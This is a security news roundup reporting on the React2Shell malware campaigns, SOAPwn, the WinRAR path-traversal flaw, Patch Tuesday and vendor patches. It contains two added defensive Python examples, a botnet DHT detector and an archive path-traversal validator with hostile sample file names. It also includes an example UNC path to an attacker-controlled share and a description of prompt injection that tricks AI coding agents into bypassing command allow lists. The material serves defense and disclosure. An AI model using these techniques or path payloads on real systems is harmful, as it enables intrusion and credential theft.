2025-12-11 AI Startup News
React2Shell Exploitation Delivers Crypto Miners and New Malware Across Multiple Sectors
React2Shell continues to witness heavy exploitation, with threat actors leveraging the maximum-severity security flaw in React Server Components (RSC) to deliver cryptocurrency miners and an array of previously undocumented malware families, according to new findings from Huntress. This includes a Linux backdoor called PeerBlight, a reverse proxy tunnel named CowTunnel, and a Go-based post-exploitation implant referred to as ZinFoq. The cybersecurity company said it has observed attackers targeting numerous organizations via CVE-2025-55182, a critical security vulnerability in RSC that allows unauthenticated remote code execution. As of December 8, 2025, these efforts have been aimed at a wide range of sectors, but prominently the construction and entertainment industries.
The first recorded exploitation attempt on a Windows endpoint by Huntress dates back to December 4, 2025, when an unknown threat actor exploited a vulnerable instance of Next.js to drop a shell script, followed by commands to drop a cryptocurrency miner and a Linux backdoor. In two other cases, attackers were observed launching discovery commands and attempting to download several payloads from a command-and-control (C2) server. Some of the notable intrusions also singled out Linux hosts to drop the XMRig cryptocurrency miner, not to mention leveraged a publicly available GitHub tool to identify vulnerable Next.js instances before commencing the attack. “Based on the consistent pattern observed across multiple endpoints, including identical vulnerability probes, shell code tests, and C2 infrastructure, we assess that the threat actor is likely leveraging automated exploitation tooling,” Huntress researchers said.
“This is further supported by the attempts to deploy Linux-specific payloads on Windows endpoints, indicating the automation does not differentiate between target operating systems.”
A brief description of some of the payloads downloaded in these attacks is as follows -
- sex.sh, a bash script that retrieves XMRig 6.24.0 directly from GitHub
- PeerBlight, a Linux backdoor that shares some code overlaps with two malware families RotaJakiro and Pink that came to light in 2021, installs a systemd service to ensure persistence, and masquerades as a “ksoftirqd” daemon process to evade detection
- CowTunnel, a reverse proxy that initiates an outbound connection to attacker-controlled Fast Reverse Proxy (FRP) servers, effectively bypassing firewalls that are configured to only monitor inbound connections
- ZinFoq, a Linux ELF binary that implements a post-exploitation framework with interactive shell, file operations, network pivoting, and timestomping capabilities
- d5.sh, a dropper script responsible for deploying the Sliver C2 framework
- fn22.sh, a “d5.sh” variant with an added self-update mechanism to fetch a new version of the malware and restart it
- wocaosinm.sh, a variant of the Kaiji DDoS malware that incorporates remote administration, persistence, and evasion capabilities
PeerBlight supports capabilities to establish communications with a hard-coded C2 server (“185.247.224[.]41:8443”), allowing it to upload/download/delete files, spawn a reverse shell, modify file permissions, run arbitrary binaries, and update itself. The backdoor also makes use of a domain generation algorithm (DGA) and BitTorrent Distributed Hash Table (DHT) network as fallback C2 mechanisms. “Upon joining the DHT network, the backdoor registers itself with a node ID beginning with the hardcoded prefix LOLlolLOL,” the researchers explained.
“This 9-byte prefix serves as an identifier for the botnet, with the remaining 11 bytes of the 20-byte DHT node ID randomized.” “When the backdoor receives DHT responses containing node lists, it scans for other nodes whose IDs start with LOLlolLOL.
When it finds a matching node, it knows this is either another infected machine or an attacker-controlled node that can provide C2 configuration.” Huntress said it identified over 60 unique nodes with the LOLlolLOL prefix, adding that multiple conditions have to be met in order for an infected bot to share its C2 configuration with another node: a valid client version, configuration availability on the responding bot’s side, and the correct transaction ID. Even when all the necessary conditions are satisfied, the bots are designed such that they only share the configuration about one-third of the time based on a random check, possibly in a bid to reduce network noise and avoid detection.
ZinFoq, in a similar manner, beacons out to its C2 server and is equipped to parse incoming instructions to run commands using “/bin/bash,” enumerate directories, read or delete files, download more payloads from a specified URL, exfiltrate files and system information, start/stop SOCKS5 proxy, enable/disable TCP port forwarding, alter file access and modification times, and establish a reverse pseudo terminal (PTY) shell connection. ZinFoq also takes steps to clear bash history and disguises itself as one of 44 legitimate Linux system services (e.g., “/sbin/audispd,” “/usr/sbin/ModemManager,” “/usr/libexec/colord,” or “/usr/sbin/cron -f”) to conceal its presence.
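The LOLlolLOL node-ID prefix described above can be used as a network detection. The following is an added example, not code from Huntress or from the malware: it decodes BitTorrent DHT (KRPC) messages and reports any sender or listed node whose 20-byte ID starts with that prefix. The function names, sample packets and addresses are constructed for illustration.

```python
import ipaddress
import struct

BOTNET_PREFIX = b"LOLlolLOL"  # 9-byte node-ID prefix reported by Huntress
NODE_ID_LEN = 20              # DHT node IDs are 20 bytes (BEP 5)
COMPACT_NODE_LEN = 26         # 20-byte ID + 4-byte IPv4 + 2-byte port


def bdecode(data, pos=0):
    """Decode one bencoded value at pos; return (value, next_pos)."""
    lead = data[pos:pos + 1]
    if lead == b"i":
        end = data.index(b"e", pos)
        return int(data[pos + 1:end]), end + 1
    if lead in (b"l", b"d"):
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b"e":
            item, pos = bdecode(data, pos)
            items.append(item)
        if lead == b"l":
            return items, pos + 1
        if len(items) % 2:
            raise ValueError("dictionary with odd item count")
        return dict(zip(items[0::2], items[1::2])), pos + 1
    if lead.isdigit():
        colon = data.index(b":", pos)
        start = colon + 1
        end = start + int(data[pos:colon])
        if end > len(data):
            raise ValueError("truncated byte string")
        return data[start:end], end
    raise ValueError(f"invalid bencode at offset {pos}")


def parse_compact_nodes(blob):
    """Split a 'nodes' value into (node_id, ip, port) tuples, ignoring a ragged tail."""
    usable = len(blob) - len(blob) % COMPACT_NODE_LEN
    nodes = []
    for off in range(0, usable, COMPACT_NODE_LEN):
        node_id = blob[off:off + NODE_ID_LEN]
        ip_raw, port = struct.unpack_from("!4sH", blob, off + NODE_ID_LEN)
        nodes.append((node_id, str(ipaddress.IPv4Address(ip_raw)), port))
    return nodes


def find_prefixed_nodes(udp_payload, src):
    """Return (role, node_id_hex, address) findings for one UDP payload from src=(ip, port)."""
    try:
        msg, _ = bdecode(udp_payload)
    except (ValueError, TypeError, RecursionError):
        return []  # not KRPC, or malformed
    if not isinstance(msg, dict):
        return []
    # Queries carry the sender's ID in "a", responses carry it in "r".
    body = msg.get(b"a") if msg.get(b"y") == b"q" else msg.get(b"r")
    if not isinstance(body, dict):
        return []
    findings = []
    sender_id = body.get(b"id")
    if (isinstance(sender_id, bytes) and len(sender_id) == NODE_ID_LEN
            and sender_id.startswith(BOTNET_PREFIX)):
        findings.append(("sender", sender_id.hex(), f"{src[0]}:{src[1]}"))
    nodes = body.get(b"nodes")
    if isinstance(nodes, bytes):
        for node_id, ip, port in parse_compact_nodes(nodes):
            if node_id.startswith(BOTNET_PREFIX):
                findings.append(("listed", node_id.hex(), f"{ip}:{port}"))
    return findings


# Constructed sample packets (not captured traffic); addresses are documentation ranges.
BOT_ID = BOTNET_PREFIX + bytes(range(11))
CLEAN_ID = bytes(range(100, 120))
SAMPLE_NODES = (BOT_ID + bytes([198, 51, 100, 7]) + struct.pack("!H", 6881)
                + CLEAN_ID + bytes([203, 0, 113, 9]) + struct.pack("!H", 51413))
SAMPLE_RESPONSE = (b"d1:rd2:id20:" + CLEAN_ID + b"5:nodes52:" + SAMPLE_NODES
                   + b"e1:t2:aa1:y1:re")
SAMPLE_QUERY = (b"d1:ad2:id20:" + BOT_ID + b"6:target20:" + CLEAN_ID
                + b"e1:q9:find_node1:t2:ab1:y1:qe")

if __name__ == "__main__":
    for payload, src in ((SAMPLE_RESPONSE, ("192.0.2.10", 6881)),
                         (SAMPLE_QUERY, ("10.0.0.5", 40000))):
        for finding in find_prefixed_nodes(payload, src):
            print(finding)
```

A "sender" finding from an internal address means that host itself announced a prefixed ID; a "listed" finding only means a peer advertised such a node.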
Organizations relying on react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack are advised to update immediately, given the “potential ease of exploitation and the severity of the vulnerability,” Huntress said. The development comes as the Shadowserver Foundation said it detected over 165,000 IP addresses and 644,000 domains with vulnerable code as of December 8, 2025, after “scan targeting improvements.” More than 99,200 instances are located in the U.S., followed by Germany (14,100), France (6,400), and India (4,500). Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
.NET SOAPwn Flaw Opens Door for File Writes and Remote Code Execution via Rogue WSDL
New research has uncovered exploitation primitives in the .NET Framework that could be leveraged against enterprise-grade applications to achieve remote code execution. WatchTowr Labs, which has codenamed the “invalid cast vulnerability” SOAPwn, said the issue impacts Barracuda Service Center RMM, Ivanti Endpoint Manager (EPM), and Umbraco 8. But the list of affected vendors is likely to be longer given the widespread use of .NET. The findings were presented today by watchTowr security researcher Piotr Bazydlo at the Black Hat Europe security conference, which is being held in London.
SOAPwn essentially allows attackers to abuse Web Services Description Language (WSDL) imports and HTTP client proxies to execute arbitrary code in products built on the foundations of .NET due to errors in the way they handle Simple Object Access Protocol (SOAP) messages. “It is usually abusable through SOAP clients, especially if they are dynamically created from the attacker-controlled WSDL,” Bazydlo said. As a result, .NET Framework HTTP client proxies can be manipulated into using file system handlers and achieve arbitrary file write by passing as URL something like “file://
In a hypothetical attack scenario, a threat actor could leverage this behavior to supply a Universal Naming Convention (UNC) path (e.g., “file://attacker.server/poc/poc”) and cause the SOAP request to be written to an SMB share under their control. This, in turn, can allow an attacker to capture the NTLM challenge and crack it. That’s not all. The research also found that a more powerful exploitation vector can be weaponized in applications that generate HTTP client proxies from WSDL files using the ServiceDescriptionImporter class by taking advantage of the fact that it does not validate the URL used by the generated HTTP client proxy.
In this technique, an attacker can provide a URL that points to a WSDL file they control to vulnerable applications, and obtain remote code execution by dropping a fully functional ASPX web shell or additional payloads like CSHTML web shells or PowerShell scripts. Following responsible disclosure in March 2024 and July 2025, Microsoft has opted not to fix the vulnerability, stating the issue stems from either an application issue or behavior, and that “users should not consume untrusted input that can generate and run code.” The findings illustrate how expected behavior in a popular framework can become a potential exploit path that leads to NTLM relaying or arbitrary file writes. The issue has since been addressed in Barracuda Service Center RMM version 2025.1.1 (CVE-2025-34392, CVSS score: 9.8) and Ivanti EPM version 2024 SU4 SR1 (CVE-2025-13659, CVSS score: 8.8). “It is possible to make SOAP proxies write SOAP requests into files rather than sending them over HTTP,” Bazydlo said.
“In many cases, this leads to remote code execution through webshell uploads or PowerShell script uploads. The exact impact depends on the application using the proxy classes.”
Three PCIe Encryption Weaknesses Expose PCIe 5.0+ Systems to Faulty Data Handling
Three security vulnerabilities have been disclosed in the Peripheral Component Interconnect Express (PCIe) Integrity and Data Encryption (IDE) protocol specification that could expose affected systems to serious risks from a local attacker. The flaws impact PCIe Base Specification Revision 5.0 and onwards in the protocol mechanism introduced by the IDE Engineering Change Notice (ECN), according to the PCI Special Interest Group (PCI-SIG). “This could potentially result in security exposure, including but not limited to, one or more of the following with the affected PCIe component(s), depending on the implementation: (i) information disclosure, (ii) escalation of privilege, or (iii) denial of service,” the consortium noted. PCIe is a widely used high-speed standard to connect hardware peripherals and components, including graphics cards, sound cards, Wi-Fi and Ethernet adapters, and storage devices, inside computers and servers.
Introduced in PCIe 6.0, PCIe IDE is designed to secure data transfers through encryption and integrity protections. The three IDE vulnerabilities, discovered by Intel employees Arie Aharon, Makaram Raghunandan, Scott Constable, and Shalini Sharma, are listed below -
- CVE-2025-9612 (Forbidden IDE Reordering) – A missing integrity check on a receiving port may allow re-ordering of PCIe traffic, leading the receiver to process stale data.
- CVE-2025-9613 (Completion Timeout Redirection) – Incomplete flushing of a completion timeout may allow a receiver to accept incorrect data when an attacker injects a packet with a matching tag.
- CVE-2025-9614 (Delayed Posted Redirection) – Incomplete flushing or re-keying of an IDE stream may result in the receiver consuming stale, incorrect data packets.
PCI-SIG said that successful exploitation of the aforementioned vulnerabilities could undermine the confidentiality, integrity, and security objectives of IDE. However, the attacks hinge on obtaining physical or low-level access to the targeted computer’s PCIe IDE interface, making them low-severity bugs (CVSS v3.1 score: 3.0/CVSS v4 score: 1.8). “All three vulnerabilities potentially expose systems implementing IDE and Trusted Domain Interface Security Protocol (TDISP) to an adversary that can breach isolation between trusted execution environments,” it said. In an advisory released Tuesday, the CERT Coordination Center (CERT/CC) urged manufacturers to follow the updated PCIe 6.0 standard and apply the Erratum #1 guidance to their IDE implementations.
Intel and AMD have published their own alerts, stating the issues impact the following products -
- Intel Xeon 6 Processors with P-cores
- Intel Xeon 6700P-B/6500P-B series SoC with P-Cores
- AMD EPYC 9005 Series Processors
- AMD EPYC Embedded 9005 Series Processors
“End users should apply firmware updates provided by their system or component suppliers, especially in environments that rely on IDE to protect sensitive data,” CERT/CC said.
Webinar: How Attackers Exploit Cloud Misconfigurations Across AWS, AI Models, and Kubernetes
Cloud security is changing. Attackers are no longer just breaking down the door; they are finding unlocked windows in your configurations, your identities, and your code. Standard security tools often miss these threats because they look like normal activity. To stop them, you need to see exactly how these attacks happen in the real world.
Next week, the Cortex Cloud team at Palo Alto Networks is hosting a technical deep dive to walk you through three recent investigations and exactly how to defend against them.
What Experts Will Cover
This isn’t a high-level overview. We are looking at specific, technical findings from the field. In this session, our experts will break down three distinct attack vectors that are bypassing traditional security right now:
- AWS Identity Misconfigurations: We will show how attackers abuse simple setup errors in AWS identities to gain initial access without stealing a single password.
- Hiding in AI Models: You will see how adversaries mask malicious files in production by mimicking the naming structures of your legitimate AI models.
- Risky Kubernetes Permissions: We will examine “overprivileged entities”—containers that have too much power—and how attackers exploit them to take over infrastructure.
We won’t just talk about the problems; we will show you the mechanics of the attacks. Register now to see the full breakdown of these threats.
Why This Matters for Your Team
The core issue with these threats is the visibility gap. Often, the Cloud team builds the environment, and the SOC (Security Operations Center) monitors it, but neither side sees the full picture. In this webinar, we will demonstrate how Code-to-Cloud detection fixes this. We will show you how to use runtime intelligence and audit logs to spot these threats early.
The Takeaway
By the end of this session, you will have actionable insights on how to:
- Audit your cloud logs for “invisible” intruders.
- Clean up risky permissions in Kubernetes.
- Apply AI-aware controls to protect your development pipeline.
Don’t wait until you find these vulnerabilities in a breach report. Join us next week and get the knowledge you need to close the gaps.
This article is a contributed piece from one of our valued partners.
Warning: WinRAR Vulnerability CVE-2025-6218 Under Active Attack by Multiple Threat Groups
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a security flaw impacting the WinRAR file archiver and compression utility to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2025-6218 (CVSS score: 7.8), is a path traversal bug that could enable code execution. However, for exploitation to succeed, it requires a prospective target to visit a malicious page or open a malicious file.
“RARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user,” CISA said in an alert. The vulnerability was patched by RARLAB with WinRAR 7.12 in June 2025. It only affects Windows-based builds. Versions of the tool for other platforms, including Unix and Android, are not affected.
“This flaw could be exploited to place files in sensitive locations — such as the Windows Startup folder — potentially leading to unintended code execution on the next system login,” RARLAB noted at the time. The development comes in the wake of multiple reports from BI.ZONE, Foresiet, SecPod, and Synaptic Security that the vulnerability has been exploited by two different threat actors tracked as GOFFEE (aka Paper Werewolf), Bitter (aka APT-C-08 or Manlinghua), and Gamaredon. In an analysis published in August 2025, the Russian cybersecurity vendor said there are indications that GOFFEE may have exploited CVE-2025-6218 along with CVE-2025-8088 (CVSS score: 8.8), another path traversal flaw in WinRAR, in attacks targeting organizations in the country in July 2025 via phishing emails. It has since emerged that the South Asia-focused Bitter APT has also weaponized the vulnerability to facilitate persistence on the compromised host and ultimately drop a C# trojan by means of a lightweight downloader.
The attack leverages a RAR archive (“Provision of Information for Sectoral for AJK.rar”) that contains a benign Word document and a malicious macro template. “The malicious archive drops a file named Normal.dotm into Microsoft Word’s global template path,” Foresiet said last month. “Normal.dotm is a global template that loads every time Word is opened. By replacing the legitimate file, the attacker ensures their malicious macro code executes automatically, providing a persistent backdoor that bypasses standard email macro blocking for documents received after the initial compromise.” The C# trojan is designed to contact an external server (“johnfashionaccess[.]com”) for command-and-control (C2) and enable keylogging, screenshot capture, remote desktop protocol (RDP) credential harvesting, and file exfiltration.
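The path traversal outcome described above (files landing in the Startup folder or Word's global template path) can be caught by checking member names before extraction. The following is an added example, not code from RARLAB or any of the vendors cited: it resolves each archive member name against the extraction root with Windows path rules and refuses names that escape the root or resolve to those two destinations. The member names and the root are constructed sample input, and treating space-padded ".." as ".." is a conservative choice of this example.

```python
import ntpath

# Destinations named on this page as persistence targets (lower-cased fragments).
SENSITIVE_FRAGMENTS = {
    "\\start menu\\programs\\startup\\": "Windows Startup folder",
    "\\microsoft\\templates\\normal.dotm": "Word global template",
}


def resolve_member(extract_root, member_name):
    """Return the normalized Windows path a member name would be written to."""
    parts = member_name.replace("/", "\\").split("\\")
    # Conservative choice of this example: '..' padded with spaces counts as '..'.
    parts = [".." if p.strip(" ") == ".." else p for p in parts]
    # ntpath.join lets an absolute, drive-qualified or UNC name replace the root,
    # which is the escape the containment check has to see.
    return ntpath.normpath(ntpath.join(extract_root, "\\".join(parts)))


def is_contained(extract_root, dest):
    """True if dest is the root itself or lies below it (case-insensitive)."""
    root = ntpath.normcase(ntpath.normpath(extract_root)).rstrip("\\")
    lowered = ntpath.normcase(dest)
    # The trailing separator stops C:\out2 from passing as a child of C:\out.
    return lowered == root or lowered.startswith(root + "\\")


def audit_members(extract_root, member_names):
    """Return (name, destination, reasons) for every member that should be refused."""
    findings = []
    for name in member_names:
        dest = resolve_member(extract_root, name)
        reasons = []
        if not is_contained(extract_root, dest):
            reasons.append("escapes extraction root")
        lowered = ntpath.normcase(dest)
        for fragment, label in SENSITIVE_FRAGMENTS.items():
            if fragment in lowered:
                reasons.append("targets " + label)
        if reasons:
            findings.append((name, dest, reasons))
    return findings


# Constructed sample input: validator test vectors, not entries from a real archive.
SAMPLE_ROOT = r"C:\Users\alice\Downloads\invoice"
SAMPLE_MEMBERS = [
    "Document.docx",
    r"docs\..\readme.txt",
    r"..\..\AppData\Roaming\Microsoft\Templates\Normal.dotm",
    "../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.lnk",
    r".. \.. \notes.txt",
    r"C:\Windows\Temp\a.dll",
    r"\\fileserver\share\drop.bin",
]

if __name__ == "__main__":
    for name, dest, reasons in audit_members(SAMPLE_ROOT, SAMPLE_MEMBERS):
        print(f"REFUSE {name!r} -> {dest} ({'; '.join(reasons)})")
```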
It’s assessed that the RAR archives are propagated via spear-phishing attacks. Last but not least, CVE-2025-6218 has also been exploited by a Russian hacking group known as Gamaredon in phishing campaigns targeting Ukrainian military, governmental, political, and administrative entities to infect them with a malware referred to as Pteranodon. The activity was first observed in November 2025. “This is not an opportunistic campaign,” a security researcher who goes by the name Robin said.
“It is a structured, military-oriented espionage and sabotage operation consistent with, and likely coordinated by, Russian state intelligence.” It’s worth noting that the adversary has also extensively abused CVE-2025-8088, using it to deliver malicious Visual Basic Script malware and even deploying a new wiper codenamed GamaWiper. “This marks the first observed instance of Gamaredon conducting destructive operations rather than its traditional espionage activities,” ClearSky said in a November 30, 2025, post on X. In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by December 30, 2025, to secure their networks.
Microsoft Issues Security Fixes for 56 Flaws, Including Active Exploit and Two Zero-Days
Microsoft closed out 2025 with patches for 56 security flaws in various products across the Windows platform, including one vulnerability that has been actively exploited in the wild. Of the 56 flaws, three are rated Critical, and 53 are rated Important in severity. Two other defects are listed as publicly known at the time of the release. These include 29 privilege escalation, 18 remote code execution, four information disclosure, three denial-of-service, and two spoofing vulnerabilities.
In total, Microsoft has addressed 1,275 CVEs in 2025, according to data compiled by Fortra. Tenable’s Satnam Narang said 2025 also marks the second consecutive year where the Windows maker has patched over 1,000 CVEs. It’s the third time it has done so since Patch Tuesday’s inception. The update is in addition to 17 shortcomings the tech giant patched in its Chromium-based Edge browser since the release of the November 2025 Patch Tuesday update.
This also includes a spoofing vulnerability in Edge for iOS (CVE-2025-62223, CVSS score: 4.3). The vulnerability that has come under active exploitation is CVE-2025-62221 (CVSS score: 7.8), a use-after-free in Windows Cloud Files Mini Filter Driver that could allow an authorized attacker to elevate privileges locally and obtain SYSTEM permissions. “File system filter drivers, aka minifilters, attach to the system software stack, and intercept requests targeted at a file system, and extend or replace the functionality provided by the original target,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “Typical use cases include data encryption, automated backup, on-the-fly compression, and cloud storage.” “The Cloud Files minifilter is used by OneDrive, Google Drive, iCloud, and others, although as a core Windows component, it would still be present on a system where none of those apps were installed.” It’s currently not known how the vulnerability is being abused in the wild and in what context, but successful exploitation requires an attacker to obtain access to a susceptible system through some other means.
Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have been credited with discovering and reporting the flaw. According to Mike Walters, president and co-founder of Action1, a threat actor could gain low-privileged access through methods like phishing, web browser exploits, or another known remote code execution flaw, and then chain it with CVE-2025-62221 to seize control of the host. Armed with this access, the attacker could deploy kernel components or abuse signed drivers to evade defenses and maintain persistence, and the access can be weaponized to achieve a domain-wide compromise when coupled with credential theft scenarios. The exploitation of CVE-2025-62221 has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities (KEV) catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to apply the patch by December 30, 2025.
The remaining two zero-days are listed below -
- CVE-2025-54100 (CVSS score: 7.8) - A command injection vulnerability in Windows PowerShell that allows an unauthorized attacker to execute code locally
- CVE-2025-64671 (CVSS score: 8.4) - A command injection vulnerability in GitHub Copilot for JetBrains that allows an unauthorized attacker to execute code locally
“This is a command injection flaw in how Windows PowerShell processes web content,” Action1’s Alex Vovk said about CVE-2025-54100. “It lets an unauthenticated attacker execute arbitrary code in the security context of a user who runs a crafted PowerShell command, such as Invoke-WebRequest.” “The threat becomes significant when this vulnerability is combined with common attack patterns. For example, an attacker can use social engineering to persuade a user or admin to run a PowerShell snippet using Invoke-WebRequest, allowing a remote server to return crafted content that triggers the parsing flaw and leads to code execution and implant deployment.” It’s worth noting that CVE-2025-64671 comes in the wake of a broader set of security vulnerabilities collectively named IDEsaster that was recently disclosed by security researcher Ari Marzouk.
The issues arise as a result of adding agentic capabilities to an integrated development environment (IDE), exposing new security risks in the process. These attacks leverage prompt injections against the artificial intelligence (AI) agents embedded into IDEs and combine them with the base IDE layer to result in information disclosure or command execution. “This uses an ‘old’ attack chain of using a vulnerable tool, so not exactly part of the IDEsaster novel attack chain,” Marzouk, who is credited with discovering and reporting the flaw, told The Hacker News. “Specifically, a vulnerable ‘execute command’ tool where you can bypass the user-configured allow list.” Marzouk also said multiple IDEs were found vulnerable to the same attack, including Kiro.dev, Cursor (CVE-2025-54131), JetBrains Junie (CVE-2025-59458), Gemini CLI, Windsurf, and Roo Code (CVE-2025-54377, CVE-2025-57771, and CVE-2025-65946).
Furthermore, GitHub Copilot for Visual Studio Code has been found to be susceptible to the vulnerability, although, in this case, Microsoft assigned it a “Medium” severity rating with no CVE. “The vulnerability states that it’s possible to gain code execution on affected hosts by tricking the LLM into running commands that bypass the guardrails and appending instructions in the user’s ‘auto-approve’ settings,” Kev Breen, senior director of cyber threat research at Immersive, said. “This can be achieved through ‘Cross Prompt Injection,’ which is where the prompt is modified not by the user but by the LLM agents as they craft their own prompts based on the content of files or data retrieved from a Model Context Protocol (MCP) server that has risen in popularity with agent-based LLMs.”
Software Patches from Other Vendors
In addition to Microsoft, security updates have also been released by other vendors over the past several weeks to rectify multiple vulnerabilities, including — Adobe, Amazon Web Services, AMD, Arm, ASUS, Atlassian, Bosch, Broadcom (including VMware), Canon, Cisco, Citrix, CODESYS, Dell, Devolutions, Django, Drupal, F5, Fortinet, Fortra, GitLab, Google Android and Pixel, Google Chrome, Google Cloud, Google Pixel Watch, Hitachi Energy, HP, HP Enterprise (including Aruba Networking and Juniper Networks), IBM, Imagination Technologies, Intel, Ivanti, Lenovo, Linux distributions (AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu), MediaTek, Mitsubishi Electric, MongoDB, Moxa, Mozilla Firefox and Firefox ESR, NVIDIA, OPPO, Progress Software, Qualcomm, React, Rockwell Automation, Samsung, SAP, Schneider Electric, Siemens, SolarWinds, Splunk, Synology, TP-Link, WatchGuard, Zoom, and Zyxel
Fortinet, Ivanti, and SAP Issue Urgent Patches for Authentication and Code Execution Flaws
Fortinet, Ivanti, and SAP have moved to address critical security flaws in their products that, if successfully exploited, could result in an authentication bypass and code execution. The Fortinet vulnerabilities affect FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager and relate to a case of improper verification of a cryptographic signature. They are tracked as CVE-2025-59718 and CVE-2025-59719 (CVSS scores: 9.8). “An Improper Verification of Cryptographic Signature vulnerability [CWE-347] in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message, if that feature is enabled on the device,” Fortinet said in an advisory.
The company, however, noted that the FortiCloud SSO login feature is not enabled in the default factory settings. FortiCloud SSO login is enabled when an administrator registers the device to FortiCare and has not disabled the toggle “Allow administrative login using FortiCloud SSO” in the registration page. To temporarily protect their systems against attacks exploiting these vulnerabilities, organizations are advised to disable the FortiCloud login feature (if enabled) until it can be updated. This can be done in two ways -
- Go to System -> Settings -> Switch “Allow administrative login using FortiCloud SSO” to Off
- Run the below command in the CLI -
    config system global
        set admin-forticloud-sso-login disable
    end
Ivanti Releases Fix for Critical EPM Flaw
Ivanti has also shipped updates to address four security flaws in Endpoint Manager (EPM), one of which is a critical severity bug in the EPM core and remote consoles.
The vulnerability, assigned the CVE identifier CVE-2025-10573, carries a CVSS score of 9.6. “Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session,” Ivanti said. Rapid7 security researcher Ryan Emmons, who discovered and reported the shortcoming on August 15, 2025, said it allows an attacker with unauthenticated access to the primary EPM web service to join fake managed endpoints to the EPM server so as to poison the administrator web dashboard with malicious JavaScript. “When an Ivanti EPM administrator views one of the poisoned dashboard interfaces during normal usage, that passive user interaction will trigger client-side JavaScript execution, resulting in the attacker gaining control of the administrator’s session,” Emmons said.
Douglas McKee, director of vulnerability intelligence at Rapid7, said in a statement that CVE-2025-10573 represents a serious risk as it’s trivial to exploit and can be done by sending a fake device report to the server using a basic file format. “While the attack only fully executes when an administrator views the dashboard, this is a routine and necessary task for IT staff; consequently, the likelihood of triggering the exploit during normal operations is high, ultimately allowing the attacker to take control of the administrator’s session,” McKee added. Ensar Seker, CISO at threat intelligence company SOCRadar, also emphasized that the user interaction requirement doesn’t reduce the vulnerability’s threat level and that it has a “significant” exploitation potential when combined with social engineering. “Remote code execution via JavaScript injection is no longer theoretical in supply chain attacks; it’s become operationally viable,” Seker said.
“Organizations must act swiftly to patch, and more importantly, implement rigorous user interface sanitization and privilege segmentation.” The company noted that user interaction is required to exploit the flaw and that it’s not aware of any attacks in the wild. It has been patched in EPM version 2024 SU4 SR1. Also patched in the same version are three other high-severity vulnerabilities (CVE-2025-13659, CVE-2025-13661, and CVE-2025-13662) that could allow a remote, unauthenticated attacker to achieve arbitrary code execution. CVE-2025-13662, like in the case of CVE-2025-59718 and CVE-2025-59719, stems from improper verification of cryptographic signatures in the patch management component.
SAP Fixes Three Critical Flaws
Lastly, SAP has pushed December security updates to address 14 vulnerabilities across multiple products, including three critical-severity flaws. They are listed below -
- CVE-2025-42880 (CVSS score: 9.9) - A code injection vulnerability in SAP Solution Manager
- CVE-2025-55754 (CVSS score: 9.6) - Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud
- CVE-2025-42928 (CVSS score: 9.1) - A deserialization vulnerability in SAP jConnect SDK for Sybase Adaptive Server Enterprise (ASE)
Boston-based SAP security platform Onapsis has been credited with reporting CVE-2025-42880 and CVE-2025-42928. The company said it identified a remote-enabled function module in SAP Solution Manager that enables an authenticated attacker to inject arbitrary code. “Given the central role of SAP Solution Manager in the SAP system landscape, we strongly recommend a timely patch,” Onapsis security researcher Thomas Fritsch said.
CVE-2025-42928, on the other hand, allows for remote code execution by providing specially crafted input to the SAP jConnect SDK component. However, a successful exploitation requires elevated privileges. With security vulnerabilities in Fortinet, Ivanti, and SAP’s software frequently exploited by bad actors, it’s essential that users move quickly to apply the fixes.
North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware
Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical React2Shell security flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. “EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday. The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware.
These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities. According to software supply chain security company Socket, it’s one of the most prolific campaigns exploiting the npm ecosystem, highlighting their ability to adapt to JavaScript and cryptocurrency-centric workflows. The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks.
It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. Once all these steps are complete, it proceeds to delete the shell script to minimize the forensic trail and runs the dropper. The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if it’s taken down.
